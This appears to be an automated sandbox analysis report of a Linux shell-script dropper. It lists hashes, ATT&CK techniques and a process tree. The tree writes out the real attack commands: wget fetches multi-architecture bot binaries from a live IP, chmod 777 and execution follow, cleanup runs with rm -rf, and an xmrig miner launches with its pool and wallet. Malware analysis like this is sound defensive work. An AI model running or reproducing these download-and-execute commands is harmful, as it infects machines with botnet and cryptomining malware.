5f52ba20358d35d9705d4893c2e28bf333f9920d13053b21352be4a1fa6c8199

Analysis

max time kernel
95s
max time network
96s
platform
debian-9_armhf
resource
debian9-armhf-20240418-en
resource tags

arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
09-11-2024 04:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tyo2831qq.sh
Size

1KB
MD5

e12d6a1166c4e290ed4ba39f96c780ad
SHA1

57038253b27c0312102758d25a77b5d1859cba3e
SHA256

5f52ba20358d35d9705d4893c2e28bf333f9920d13053b21352be4a1fa6c8199
SHA512

276aabcf2037ad435a105ded3f3bfb8491fb391d5e1d49942d41774807c3f0b4e15d1ed18a57f0d783cd9aafee3ce1a96e561d3ee6da02b5d6c51fc579bb91ee

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 12 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
669	chmod
679	chmod
689	chmod
702	chmod
710	chmod
745	chmod
764	chmod
659	chmod
685	chmod
693	chmod
721	chmod
729	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/bots	671	bots

Reads system routing table 1 TTPs 3 IoCs

Gets active network interfaces from /proc virtual filesystem.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	tyo2831qq.arm7
File opened for reading	/proc/net/route	tyo2831qq.arm6
File opened for reading	/proc/net/route	tyo2831qq.ppc

Reads system network configuration 1 TTPs 3 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	tyo2831qq.ppc
File opened for reading	/proc/net/route	tyo2831qq.arm7
File opened for reading	/proc/net/route	tyo2831qq.arm6

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
645	wget
661	tyo2831qq.mips
756	rm

Writes file to tmp directory 11 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/tyo2831qq.mpsl	wget
File opened for modification	/tmp/tyo2831qq.ppc	wget
File opened for modification	/tmp/tyo2831qq.i586	wget
File opened for modification	/tmp/tyo2831qq.arm7	wget
File opened for modification	/tmp/tyo2831qq.mips	wget
File opened for modification	/tmp/tyo2831qq.sh4	wget
File opened for modification	/tmp/tyo2831qq.x86	wget
File opened for modification	/tmp/tyo2831qq.arm6	wget
File opened for modification	/tmp/tyo2831qq.x32	wget
File opened for modification	/tmp/tyo2831qq.m68k	wget
File opened for modification	/tmp/bots	wget

/tmp/tyo2831qq.sh
/tmp/tyo2831qq.sh
1⤵
PID:643
- /usr/bin/wget
  wget http://31.172.80.237/tyo2831qq.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:645
- /bin/chmod
  chmod 777 tyo2831qq.mips
  2⤵
  - File and Directory Permissions Modification
  PID:659
- /tmp/tyo2831qq.mips
  ./tyo2831qq.mips
  2⤵
  - System Network Configuration Discovery
  PID:661
- /usr/bin/wget
  wget http://31.172.80.237/bots
  2⤵
  - Writes file to tmp directory
  PID:664
- /bin/chmod
  chmod 777 bots
  2⤵
  - File and Directory Permissions Modification
  PID:669
- /tmp/bots
  ./bots
  2⤵
  - Executes dropped EXE
  PID:671
- /usr/bin/wget
  wget http://31.172.80.237/tyo2831qq.mpsl
  2⤵
  - Writes file to tmp directory
  PID:673
- /bin/chmod
  chmod 777 tyo2831qq.mpsl
  2⤵
  - File and Directory Permissions Modification
  PID:679
- /tmp/tyo2831qq.mpsl
  ./tyo2831qq.mpsl
  2⤵
  PID:680
- /usr/bin/wget
  wget http://31.172.80.237/tyo2831qq.sh4
  2⤵
  - Writes file to tmp directory
  PID:683
- /bin/chmod
  chmod 777 tyo2831qq.sh4
  2⤵
  - File and Directory Permissions Modification
  PID:685
- /tmp/tyo2831qq.sh4
  ./tyo2831qq.sh4
  2⤵
  PID:686
- /usr/bin/wget
  wget http://31.172.80.237/tyo2831qq.x86
  2⤵
  - Writes file to tmp directory
  PID:688
- /bin/chmod
  chmod 777 tyo2831qq.x86
  2⤵
  - File and Directory Permissions Modification
  PID:689
- /tmp/tyo2831qq.x86
  ./tyo2831qq.x86
  2⤵
  PID:690
- /usr/bin/wget
  wget http://31.172.80.237/tyo2831qq.arm6
  2⤵
  - Writes file to tmp directory
  PID:692
- /bin/chmod
  chmod 777 tyo2831qq.arm6
  2⤵
  - File and Directory Permissions Modification
  PID:693
- /tmp/tyo2831qq.arm6
  ./tyo2831qq.arm6
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:694
- /usr/bin/wget
  wget http://31.172.80.237/tyo2831qq.x32
  2⤵
  - Writes file to tmp directory
  PID:697
- /bin/chmod
  chmod 777 tyo2831qq.x32
  2⤵
  - File and Directory Permissions Modification
  PID:702
- /tmp/tyo2831qq.x32
  ./tyo2831qq.x32
  2⤵
  PID:703
- /usr/bin/wget
  wget http://31.172.80.237/tyo2831qq.ppc
  2⤵
  - Writes file to tmp directory
  PID:705
- /bin/chmod
  chmod 777 tyo2831qq.ppc
  2⤵
  - File and Directory Permissions Modification
  PID:710
- /tmp/tyo2831qq.ppc
  ./tyo2831qq.ppc
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:712
- /usr/bin/wget
  wget http://31.172.80.237/tyo2831qq.i586
  2⤵
  - Writes file to tmp directory
  PID:715
- /bin/chmod
  chmod 777 tyo2831qq.i586
  2⤵
  - File and Directory Permissions Modification
  PID:721
- /tmp/tyo2831qq.i586
  ./tyo2831qq.i586
  2⤵
  PID:722
- /usr/bin/wget
  wget http://31.172.80.237/tyo2831qq.m68k
  2⤵
  - Writes file to tmp directory
  PID:724
- /bin/chmod
  chmod 777 tyo2831qq.m68k
  2⤵
  - File and Directory Permissions Modification
  PID:729
- /tmp/tyo2831qq.m68k
  ./tyo2831qq.m68k
  2⤵
  PID:731
- /usr/bin/wget
  wget http://31.172.80.237/tyo2831qq.spc
  2⤵
  PID:734
- /usr/bin/wget
  wget http://31.172.80.237/tyo2831qq.arm4
  2⤵
  PID:737
- /usr/bin/wget
  wget http://31.172.80.237/tyo2831qq.arm7
  2⤵
  - Writes file to tmp directory
  PID:740
- /bin/chmod
  chmod 777 tyo2831qq.arm7
  2⤵
  - File and Directory Permissions Modification
  PID:745
- /tmp/tyo2831qq.arm7
  ./tyo2831qq.arm7
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:747
- /usr/bin/wget
  wget http://31.172.80.237/tyo2831qq.arm5
  2⤵
  PID:750
- /bin/rm
  rm -rf tyo2831qq.arm6 tyo2831qq.arm7 tyo2831qq.i586 tyo2831qq.m68k tyo2831qq.mips tyo2831qq.mpsl tyo2831qq.ppc tyo2831qq.sh tyo2831qq.sh4 tyo2831qq.x32 tyo2831qq.x86
  2⤵
  - System Network Configuration Discovery
  PID:756
- /usr/bin/wget
  wget https://github.com/m3Mastika/Dockerfile/raw/refs/heads/main/xmrig
  2⤵
  PID:759
- /bin/chmod
  chmod 777 xmrig
  2⤵
  - File and Directory Permissions Modification
  PID:764
- /tmp/xmrig
  ./xmrig --url pool.hashvault.pro:80 --user 48mn9hwNxkfjYAppkEaghU1pRbaThMVmnFHuQT44TTDRLLaUsDNCyWDStDZ5DjUqyLaiaywMirbPp1y1zPiVgCeV35ENMV7 --pass bos -B
  2⤵
  PID:765

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/bots

Filesize
16KB

MD5
2615e32f9e7b42b36ba1f3dd6f8f7e3c

SHA1
4286d999a1a76da1e68cb227e01de237ef5fcf68

SHA256
e9bc9d0324b4943e9a9419c9be202331efe86a055768286b45a6ff80eb172078

SHA512
b9e21c618c03d111405f5d0e33d08a9bbe37ec6361773f02fde806a2cd784355cc43c64bce22ceeabc2a2e69f277989a26501085c6df725b8bccd9b52ce4ff78

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads